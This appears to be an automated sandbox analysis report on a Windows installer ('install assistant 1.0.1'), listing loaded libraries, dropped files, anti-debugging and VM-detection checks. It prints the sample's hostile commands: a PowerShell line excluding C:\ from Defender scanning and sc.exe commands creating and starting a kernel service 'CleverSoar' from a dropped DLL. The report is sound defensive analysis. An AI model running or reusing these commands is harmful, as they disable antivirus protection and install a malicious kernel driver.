Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe | Static file information: File size 8595621 > 1048576
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2113537072.0000000001380000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2113433554.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007957D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_007957D0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x3439cd
Source: update.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: update.vac.2.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe | Static PE information: real checksum: 0x0 should be: 0x838234
Source: hrsw.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.12.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x3439cd
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.2.dr | Static PE information: section name: .00cfg
Source: update.vac.2.dr | Static PE information: section name: .voltbl
Source: update.vac.2.dr | Static PE information: section name: .8Tk
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: hrsw.vbc.6.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr | Static PE information: section name: .8Tk
Source: update.vac.6.dr | Static PE information: section name: .00cfg
Source: update.vac.6.dr | Static PE information: section name: .voltbl
Source: update.vac.6.dr | Static PE information: section name: .8Tk
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9C86EB push ecx; ret 6_2_6C9C86FE
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C870F00 push ss; retn 0001h 6_2_6C870F0A
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA96F10 push eax; ret 6_2_6CA96F2E
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9FB9F4 push 004AC35Ch; ret 6_2_6C9FBA0E
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA97290 push eax; ret 6_2_6CA972BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007145F4 push 007BC35Ch; ret 10_2_0071460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007AFB10 push eax; ret 10_2_007AFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007AFE90 push eax; ret 10_2_007AFEBE
Source: update.vac.2.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.6.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.6.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | File created: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | File created: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\update.vac
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5693
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3929
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Window / User API: threadDelayed 648
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Window / User API: threadDelayed 717
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Window / User API: threadDelayed 621
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe; API coverage: 7.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648; Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Code function: 6_2_6C9BAEC0 FindFirstFileA,FindClose,FindClose, 6_2_6C9BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00716868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00716868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00717496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00717496
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00719C60 GetSystemInfo, 10_2_00719C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000002.00000002.2073106693.000000000098E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Code function: 6_2_6C843886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6C843886
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Code function: 6_2_6C9D0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C9D0181
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_007957D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_007957D0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Code function: 6_2_6C9D9D35 mov eax, dword ptr fs:[00000030h] 6_2_6C9D9D35
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Code function: 6_2_6C9D9D66 mov eax, dword ptr fs:[00000030h] 6_2_6C9D9D66
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Code function: 6_2_6C9CF17D mov eax, dword ptr fs:[00000030h] 6_2_6C9CF17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Code function: 6_2_6C9C8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6C9C8CBD
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Code function: 6_2_6C9D0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C9D0181

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.12.dr; Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe; Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp; Code function: 6_2_6CA97720 cpuid 6_2_6CA97720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
